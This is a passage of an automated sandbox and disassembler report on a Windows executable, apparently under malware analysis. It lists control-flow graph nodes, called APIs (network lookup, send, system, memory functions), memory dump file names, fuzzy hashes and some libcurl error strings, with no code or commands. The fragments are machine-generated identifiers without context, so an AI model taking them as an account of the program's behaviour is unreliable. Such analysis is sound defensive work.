7ff6029d911b-7ff6029d912a free 2316->2320 2321 7ff6029d90b7-7ff6029d90cd memcpy 2316->2321 2317->2309 2318->2318 2318->2319 2319->2301 2320->2309 2322 7ff6029d90cf-7ff6029d90dc _strdup 2321->2322 2323 7ff6029d90de-7ff6029d90e8 2321->2323 2322->2323 2324 7ff6029d9100-7ff6029d9119 free * 2 2322->2324 2325 7ff6029d90ee 2323->2325 2326 7ff6029d90ea 2323->2326 2324->2309 2325->2305 2326->2325
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$malloc$ErrorLast_strdupfreeaddrinfogetaddrinfomemcpy
                                        • String ID:
                                        • API String ID: 2364279375-0
                                        • Opcode ID: 92f1dd02e77ef6866300f81a3e7edaadc0e4f6ac73d95d5bcc1c9b54f38ed787
                                        • Instruction ID: 8a5e12b2702b83bb8d08f4b2a5052126f71d7ca1efa9a3dd3fda9b77a58fda48
                                        • Opcode Fuzzy Hash: 92f1dd02e77ef6866300f81a3e7edaadc0e4f6ac73d95d5bcc1c9b54f38ed787
                                        • Instruction Fuzzy Hash: 82514C36A09B4282FB65AF12A55423A7BA0FF48B98F244035DE9E93751DFBCE445D700

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2327 7ff6029c4ea0-7ff6029c4ebe call 7ff6029c5e80 2330 7ff6029c4ec0-7ff6029c4ec5 call 7ff6029eee50 2327->2330 2331 7ff6029c4ec7 call 7ff6029eee10 2327->2331 2334 7ff6029c4ecc-7ff6029c4eed 2330->2334 2331->2334 2336 7ff6029c4ef3-7ff6029c4efb 2334->2336 2337 7ff6029c517b 2334->2337 2338 7ff6029c4f59-7ff6029c4f61 2336->2338 2339 7ff6029c4efd-7ff6029c4f11 call 7ff6029eea80 2336->2339 2340 7ff6029c5180-7ff6029c519c 2337->2340 2342 7ff6029c5018-7ff6029c5030 call 7ff6029eef90 2338->2342 2343 7ff6029c4f67-7ff6029c4f9a call 7ff6029ef5b0 2338->2343 2339->2338 2349 7ff6029c4f13-7ff6029c4f19 2339->2349 2350 7ff6029c4fa3-7ff6029c4fa6 2342->2350 2352 7ff6029c5036-7ff6029c504e 2342->2352 2347 7ff6029c4f9f-7ff6029c4fa1 2343->2347 2347->2350 2351 7ff6029c4fda-7ff6029c4fee call 7ff6029eef90 2347->2351 2353 7ff6029c4f28-7ff6029c4f45 call 7ff6029c96c0 2349->2353 2354 7ff6029c4f1b-7ff6029c4f22 free 2349->2354 2355 7ff6029c4fce 2350->2355 2356 7ff6029c4fa8-7ff6029c4fab 2350->2356 2351->2350 2371 7ff6029c4ff0-7ff6029c4ff6 2351->2371 2357 7ff6029c5050-7ff6029c505d call 7ff6029cabb0 2352->2357 2358 7ff6029c506c-7ff6029c5083 call 7ff6029c6280 2352->2358 2353->2337 2372 7ff6029c4f4b-7ff6029c4f52 2353->2372 2354->2353 2364 7ff6029c4fd3-7ff6029c4fd5 2355->2364 2361 7ff6029c4fc2-7ff6029c4fc9 2356->2361 2362 7ff6029c4fad 2356->2362 2375 7ff6029c505f-7ff6029c506a 2357->2375 2376 7ff6029c5088-7ff6029c5091 2357->2376 2358->2340 2361->2340 2368 7ff6029c4fb0 2362->2368 2364->2340 2373 7ff6029c51e4-7ff6029c51eb 2368->2373 2374 7ff6029c4fb6-7ff6029c4fbd 2368->2374 2377 7ff6029c5005-7ff6029c5011 2371->2377 2378 7ff6029c4ff8-7ff6029c4fff free 2371->2378 2372->2338 2373->2340 2374->2340 2375->2357 2375->2358 2376->2358 2379 7ff6029c5093-7ff6029c509a 2376->2379 2377->2342 2378->2377 2380 7ff6029c50a4-7ff6029c50cf call 7ff6029eef90 2379->2380 2381 7ff6029c509c-7ff6029c50a2 2379->2381 2384 7ff6029c50d5-7ff6029c50ec _strdup 2380->2384 2385 7ff6029c519d-7ff6029c51a0 2380->2385 2381->2358 2381->2380 2384->2337 2386 7ff6029c50f2 2384->2386 2387 7ff6029c50f9-7ff6029c5119 call 7ff6029eef90 2385->2387 2388 7ff6029c51a6-7ff6029c51a9 2385->2388 2386->2387 2393 7ff6029c51c0-7ff6029c51c3 2387->2393 2394 7ff6029c511f-7ff6029c5136 _strdup 2387->2394 2388->2355 2390 7ff6029c51af-7ff6029c51b2 2388->2390 2390->2361 2391 7ff6029c51b8-7ff6029c51bb 2390->2391 2391->2368 2395 7ff6029c513f-7ff6029c515c call 7ff6029eef90 2393->2395 2396 7ff6029c51c9-7ff6029c51cc 2393->2396 2394->2337 2397 7ff6029c5138 2394->2397 2402 7ff6029c5162-7ff6029c5179 _strdup 2395->2402 2403 7ff6029c51ed-7ff6029c51f0 2395->2403 2396->2355 2398 7ff6029c51d2-7ff6029c51d5 2396->2398 2397->2395 2398->2361 2400 7ff6029c51db-7ff6029c51de 2398->2400 2400->2364 2400->2373 2402->2337 2404 7ff6029c51f2-7ff6029c520a call 7ff6029eef90 2402->2404 2403->2396 2403->2404 2407 7ff6029c5227-7ff6029c523f call 7ff6029eef90 2404->2407 2408 7ff6029c520c-7ff6029c5221 call 7ff6029cabb0 2404->2408 2413 7ff6029c5241-7ff6029c5244 2407->2413 2414 7ff6029c5268-7ff6029c5283 call 7ff6029eef90 2407->2414 2408->2337 2408->2407 2413->2355 2415 7ff6029c524a-7ff6029c524d 2413->2415 2420 7ff6029c52a1-7ff6029c52c4 strtoul call 7ff6029c8c90 2414->2420 2421 7ff6029c5285-7ff6029c529a call 7ff6029cabb0 2414->2421 2415->2361 2417 7ff6029c5253-7ff6029c5256 2415->2417 2417->2364 2419 7ff6029c525c-7ff6029c5263 2417->2419 2419->2340 2427 7ff6029c52ca-7ff6029c52ea call 7ff6029eef90 2420->2427 2426 7ff6029c529c 2421->2426 2421->2427 2426->2337 2430 7ff6029c531d-7ff6029c533b _strdup 2427->2430 2431 7ff6029c52ec-7ff6029c52ef 2427->2431 2430->2337 2433 7ff6029c5341-7ff6029c5350 2430->2433 2431->2430 2432 7ff6029c52f1-7ff6029c52fb 2431->2432 2434 7ff6029c5302-7ff6029c530b 2432->2434 2435 7ff6029c5352 2433->2435 2436 7ff6029c5358-7ff6029c535a 2433->2436 2434->2434 2437 7ff6029c530d-7ff6029c5318 call 7ff6029c5f50 2434->2437 2435->2436 2436->2340 2437->2430
                                        APIs
                                          • Part of subcall function 00007FF6029C5E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C5E94
                                          • Part of subcall function 00007FF6029C5E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C5EAA
                                          • Part of subcall function 00007FF6029C5E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C5EBE
                                          • Part of subcall function 00007FF6029C5E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C5ED2
                                          • Part of subcall function 00007FF6029C5E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C5EE6
                                          • Part of subcall function 00007FF6029C5E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C5EFA
                                          • Part of subcall function 00007FF6029C5E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C5F0E
                                          • Part of subcall function 00007FF6029C5E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C5F22
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029C4F22
                                          • Part of subcall function 00007FF6029EEE50: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEE65
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEE7F
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEE9A
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEEB6
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEED2
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEEEA
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEF02
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEF1A
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEF32
                                          • Part of subcall function 00007FF6029EEE50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEF4A
                                          • Part of subcall function 00007FF6029EEE50: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029C4EC5,?,?,?,?,?,00007FF6029C32CC), ref: 00007FF6029EEF64
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029C5126
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029C5169
                                        • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF6029C52AE
                                        • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029C532B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: _strdup$free$callocstrtoul
                                        • String ID: %s://%s$Protocol "%s" not supported or disabled in libcurl$file
                                        • API String ID: 954404409-4150109901
                                        • Opcode ID: 6758a42c2f5dc663757ed3170074909e8fe14141e5650ad0774a33f90f12d84c
                                        • Instruction ID: 4103ffd9f0f4017e2b98af13eb6271beecd61f1c1642061f76348dd151961998
                                        • Opcode Fuzzy Hash: 6758a42c2f5dc663757ed3170074909e8fe14141e5650ad0774a33f90f12d84c
                                        • Instruction Fuzzy Hash: 36C18131B08A8296EB688B26D9543B92B90FF44B48F740931DA5DD7686EFBCF554C340
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLastSleep
                                        • String ID:
                                        • API String ID: 1458359878-0
                                        • Opcode ID: 3eaa5cdda63adafe87d7bc7021b97494535538da4074dd7caebf54caf0cff9b4
                                        • Instruction ID: b18a369c9c13ecd2b079699413f12405e0741336dc6992f475f2fca4f364a7e1
                                        • Opcode Fuzzy Hash: 3eaa5cdda63adafe87d7bc7021b97494535538da4074dd7caebf54caf0cff9b4
                                        • Instruction Fuzzy Hash: 7C914131B0C64286EB684E27F9402B96A98FF4435CF704139E95EC7BC5DFBCE9459600
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFA0B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFA71
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFA7F
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFB7D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFBE6
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFBFE
                                          • Part of subcall function 00007FF6029EEB50: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF6029EEB60
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFC26
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFC3D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFC62
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFCAF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029EFCC4
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE0C
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE16
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE20
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE2A
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE34
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE3E
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE48
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE52
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE5C
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE66
                                          • Part of subcall function 00007FF6029EFE00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029EEE32,?,?,00000000,00007FF6029C5F3B,?,?,00000000,00007FF6029C1983,?,?,00000000,00007FF6029C1F05), ref: 00007FF6029EFE70
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$calloc$_strdup
                                        • String ID: ,$:
                                        • API String ID: 2460172880-4193410690
                                        • Opcode ID: ee5d17ec08a13b99c4923db94e6ec4764f22cf3a1575fb3409643455dd1af72b
                                        • Instruction ID: 8bccda28be5cdba1eef05876a3bae28bd728b6e3625240e574bab8fbbc8e9ffe
                                        • Opcode Fuzzy Hash: ee5d17ec08a13b99c4923db94e6ec4764f22cf3a1575fb3409643455dd1af72b
                                        • Instruction Fuzzy Hash: 10515522E08A8682FB219B3695202796761BF5578CF249235CE8D96957FFACF5C58300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: calloc
                                        • String ID: Couldn't resolve host '%s'$Couldn't resolve proxy '%s'$Unix socket path too long: '%s'
                                        • API String ID: 2635317215-3812100122
                                        • Opcode ID: f08da87b223e4afb787e14741a77dd1769841e215b917ae838169de794eb3b9c
                                        • Instruction ID: de964bf45d023b105c5337def48261f491dedb996205735119aaa0eaf85d5086
                                        • Opcode Fuzzy Hash: f08da87b223e4afb787e14741a77dd1769841e215b917ae838169de794eb3b9c
                                        • Instruction Fuzzy Hash: 6F51A122A0CB8287FB198B2694903796B90EF84B98FB40431DB4DC7796DF7DF5558B00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: system
                                        • String ID: .8$h%49
                                        • API String ID: 3377271179-4206735779
                                        • Opcode ID: a7e926d66bff3890010a4de0419013d2960dc4d2cd83e741db80a3a17baeac22
                                        • Instruction ID: 399febefe7b4edcfe7a418566e34db38308ee16759dc8ae734ff1e428cccbcef
                                        • Opcode Fuzzy Hash: a7e926d66bff3890010a4de0419013d2960dc4d2cd83e741db80a3a17baeac22
                                        • Instruction Fuzzy Hash: EC616C22E287D688F301CBB8E8451BC7B71BB9971CF105338DEC966D55EFA81188C744
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                        • String ID:
                                        • API String ID: 1133592946-0
                                        • Opcode ID: de375b220b439a9c4fbc24da6c3cfafd4a664fed8df3b2246a19f881dec74204
                                        • Instruction ID: e79dbf4b9b1c2dbc0a73e381cc0bd3e0c6e1d2d009e079be7bf2e3bcea487bde
                                        • Opcode Fuzzy Hash: de375b220b439a9c4fbc24da6c3cfafd4a664fed8df3b2246a19f881dec74204
                                        • Instruction Fuzzy Hash: FB314B21E0C24382FB50AB6194E53BA6B91AF5978CF744035EA4DCB6D3DEECE844C301
                                        APIs
                                          • Part of subcall function 00007FF6029D8FE0: getaddrinfo.WS2_32 ref: 00007FF6029D9002
                                          • Part of subcall function 00007FF6029D8FE0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029BBB05), ref: 00007FF6029D906E
                                          • Part of subcall function 00007FF6029D8FE0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029BBB05), ref: 00007FF6029D90A8
                                          • Part of subcall function 00007FF6029D8FE0: memcpy.VCRUNTIME140(?,?,?,00007FF6029BBB05), ref: 00007FF6029D90C1
                                          • Part of subcall function 00007FF6029D8FE0: _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF6029BBB05), ref: 00007FF6029D90CF
                                          • Part of subcall function 00007FF6029D8FE0: freeaddrinfo.WS2_32(?,?,?,00007FF6029BBB05), ref: 00007FF6029D9141
                                          • Part of subcall function 00007FF6029D8FE0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029BBB05), ref: 00007FF6029D9155
                                          • Part of subcall function 00007FF6029D8FE0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029BBB05), ref: 00007FF6029D915F
                                          • Part of subcall function 00007FF6029D8FE0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6029BBB05), ref: 00007FF6029D916C
                                        • WSAGetLastError.WS2_32 ref: 00007FF6029BBB0B
                                        • WSAGetLastError.WS2_32 ref: 00007FF6029BBB15
                                        • EnterCriticalSection.KERNEL32 ref: 00007FF6029BBB30
                                        • LeaveCriticalSection.KERNEL32 ref: 00007FF6029BBB3F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029BBB50
                                        • send.WS2_32 ref: 00007FF6029BBB73
                                        • WSAGetLastError.WS2_32 ref: 00007FF6029BBB7D
                                        • LeaveCriticalSection.KERNEL32 ref: 00007FF6029BBB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$CriticalErrorLastSection$Leavemalloc$Enter_strdupfreeaddrinfogetaddrinfomemcpysend
                                        • String ID:
                                        • API String ID: 506363382-0
                                        • Opcode ID: a6177786e67ce207a14383e80216342d564401e2ecc507d782a46ab400b51c53
                                        • Instruction ID: 806dc4eda7e47541fbccb8eea2687dc66b1d1c5ceb5d84091b810aa9da4233d5
                                        • Opcode Fuzzy Hash: a6177786e67ce207a14383e80216342d564401e2ecc507d782a46ab400b51c53
                                        • Instruction Fuzzy Hash: 42316631A0865285E7508F26E4A426E3BA0FF88BACF640135DE5EC36E9DFBCD485C740
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLastSleep
                                        • String ID:
                                        • API String ID: 1458359878-0
                                        • Opcode ID: cfc8ec446ff317ecc00fd428b9dae46fb424ecc2b66ae7b6bce6886c4fe073b3
                                        • Instruction ID: acc286c386f6c03c97d2620dc6005a30a0705d4194023bbb51642d32441e8b07
                                        • Opcode Fuzzy Hash: cfc8ec446ff317ecc00fd428b9dae46fb424ecc2b66ae7b6bce6886c4fe073b3
                                        • Instruction Fuzzy Hash: 02A10B35B1865686EB694F26E4103B96A99FF44BACF204235ED1EC7BC5DFBDE8009700
                                        APIs
                                        Strings
                                        Memory Dump Source
